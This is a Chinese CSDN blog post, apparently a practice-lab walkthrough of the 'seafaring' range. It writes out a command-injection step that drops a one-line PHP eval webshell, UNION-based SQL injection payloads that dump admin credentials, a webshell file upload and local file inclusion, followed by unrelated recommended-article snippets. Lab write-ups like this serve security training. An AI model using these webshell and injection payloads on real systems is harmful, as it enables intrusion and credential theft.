seafaring寻找漏洞

最新推荐文章于 2024-09-13 15:54:14 发布
最新推荐文章于 2024-09-13 15:54:14 发布
阅读量236 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78031880/article/details/142208346
版权

一.命令执行漏洞

(1)下面有一个输入框,输入ls进行查看

(2)输入echo '<?php phpinfo();?>' > qxl.php 并且访问

(3)写入一句话木马,并且访问蚁剑连接

echo '<?php @eval($_POST['cmd'];?>'>q.php

二.sql注入

测试sql注入为数字型

(1)查询数据库

-1 union select 1,2,database()

(2)查看表名

-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

(3)查看列名

1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' #

(4)查看admin的账号和密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

(5)最终得出账号是admin,密码是mysql

三.文件上传漏洞

(1)使用得到的账号密码进行登录,进去之后发现可以上传文件

(2)写入一句话木马到qxl.php然后上传,并且访问上传成功后得到的路径

(3)蚁剑连接

四.文件包含漏洞

(1)首页的关于界面存在文件包含漏洞

(2).访问之前写入的qxl.php中进行查看发现远程文件包含关闭,本地文件可以访问

(3).包含之前的q.php一句话木马,访问并且蚁剑连接

谪仙123
关注
求助 MOR-Tales of seafaring
fsjcondingle的博客
02-09 371
题目大意: 小科经常会听爷爷给他讲述年轻时航海的故事,从一个港口开始航行,经过许多水路,最后到达了另一个港口,每次都能最高效地完成航行。 听多了,小科就开始怀疑爷爷是在吹牛,于是他打算写一个程序,验证爷爷谷故事中的航行能不能完成 故事场景中,有n个港口,m条水路、每条水路连接着2个港口,每个航行故事中会询问两个港口间是否有长度为d的路径(不一定是简单路径),即可以重复走一条边。 输入格式 第一行有三个整数n、m和k(2<=n<=5000, 1<=m<=5000, 1&l
【CTF解题】BCTF2018-houseofatum-Writeup题解
HBohan的博客
10-14 416
先把ld和Libc给换成题目给的 patchelf --set-interpreter ./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/ld-2.26.so --replace-needed ./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6 ./glibc-all-in-one/libs/2.26- 0ubuntu2_amd64/libc-2.26.so houseofAtum 程序分析 这里只进行一些.
SEAFARING靶场漏洞攻略
最新发布
2301_81881972的博客
09-13 347
>echo '' > 1.php。
seafaring靶场漏洞测试攻略
shw_yzh的博客
09-13 325
seafaring靶场漏洞测试攻略
seafaring靶场渗透测试
2301_81525518的博客
09-13 229
进来这里有个框尝试xss没有那咱们就来试试搜索行注入这里有东西说明闭合成功,接着就order by 有三列三个地方都有回显查看数据库这里查表发现只有两个先去看看admin先来看看列然后看用户密码,这里密码直接显示出来了。
[POI2013]MOR-Tales of seafaring
weixin_30586257的博客
07-10 78
题目 思博题,发现一旦路径太长我们可以来回走最后一条边,但是这样并不能改变路径长度的奇偶性 所以求一下所有点之间奇最短路和偶最短路就好了,直接暴力\(BFS\)即可 有一个烦人的特判 代码 #include<bits/stdc++.h> #define mp std::make_pair #define re register inline int read() { ...
[POI2013] MOR-Tales of seafaring
acteu20420的专栏
09-15 159
传送门 简单题意:给n个点m条边无向图,每次询问两个点之间是否有长度为d的路径(不一定是简单路径)。即可以重复走一条边。 思路: 蛮水的叭。我们知道路径可以重复走,所以只要找到一条和d奇偶性相同的最短路,就可以做到了。 因为可以在一条边上不停来来回回,也就是在最短路上加上了一个偶数-->偶数大小任意!!!; 此处应有代码: 1 #include<bi...
BZOJ3417[Poi2013]Tales of seafaring——BFS
weixin_30462049的博客
09-17 97
题目描述 Young Bytensson loves to hang out in the port tavern, where he often listens to the sea dogs telling their tales of seafaring. Initially, he believed them all, however incredible they sounded....
中国海洋大学2022CTF校赛
web13618542420的博客
05-15 302
中国海洋大学2022校赛 质量总的来说还不错,类似于新生赛,偏简单,不过有些题还是很有趣的. http://github.com/tangzichengcc/The_Growth_Path_Of_A_CTFer_And_Pwner 题目的附件放在了我的github项目,有兴趣的朋友可以去做一下 被和谐了好像,在这个项目里 The_Growth_Path_Of_A_CTFer_And_Pwner 文章目录 中国海洋大学2022校赛 web very old php game 你比香农都牛逼 Baby
gre 分类词汇,gre 分类词汇,gre 分类词汇,gre 分类词汇,
06-14
- **seafaring**:航海的,与海上旅行有关的活动。 - **piscatorial**:渔猎的,与捕鱼相关的活动。 - **hulk**:残骸,废弃或损坏严重的船只。 - **junk**:帆船,中国传统的木质帆船。 - **earing**:耳钉,一种...
A Brief History of Humankind — 01 the cognitive revolution
qq_42347617的博客
05-17 2643
1. The Cognitive Revolution 1.1 An Animal of No Significance Word List: Word Interpretation Domain n.域 Kingdom n.界 Phylum n.门 Class n.纲 Order n.目 Family n.科 genus n.“属” 名 speci...
零信任安全:重新思考数字世界的访问
网络研究观
09-09 790
零信任安全在当前数字时代的关键重要性和有效性,将其作为增强网络安全弹性的基本战略。‍
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 955
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1814
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
浅谈网络安全的认识与学习规划
qq_201729558
09-05 1183
本文主要介绍网络安全认识与学习规划
【Authing身份云-注册安全分析报告-无验证方式导致安全隐患】
09-09 803
Authing身份云隶属于北京蒸汽记忆科技有限公司, 是专业的员工身份管理和用户身份管理服务提供商,为企业和开发者提供快速、安全的身份认证和访问管理方案。基于员工和用户身份管理,Authing 推出了单点登录、自适应多因素认证、手机号码闪验、应用集成网关、权限管理、通用登录组件、自定义数据库连接等产品。作为身份验证的厂家,好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
个人信息记录安全:守护数字时代的隐私堡垒
大厂全栈码农
09-09 1440
同时,也强调了个人在保护自身信息方面的意识与行为的重要性,最后对个人信息记录安全的未来发展趋势进行了展望,旨在为构建更安全的个人信息环境提供全面且深入的思考。此外,在移动互联网时代,个人信息还存在于各种移动应用程序中,从社交软件、购物应用到金融理财 APP 等,这些应用在为用户提供便捷服务的同时,也收集和存储了大量的个人信息。例如,一些电商平台在用户浏览商品时,收集了大量与购物无关的个人信息,如地理位置、设备信息等,并将这些信息用于精准营销,甚至在用户不知情的情况下将信息共享给其他第三方公司。
GORM安全-保护你的应用免受SQL注入攻击
一起coding,一起嗨。
09-12 400
GORM安全-保护你的应用免受SQL注入攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值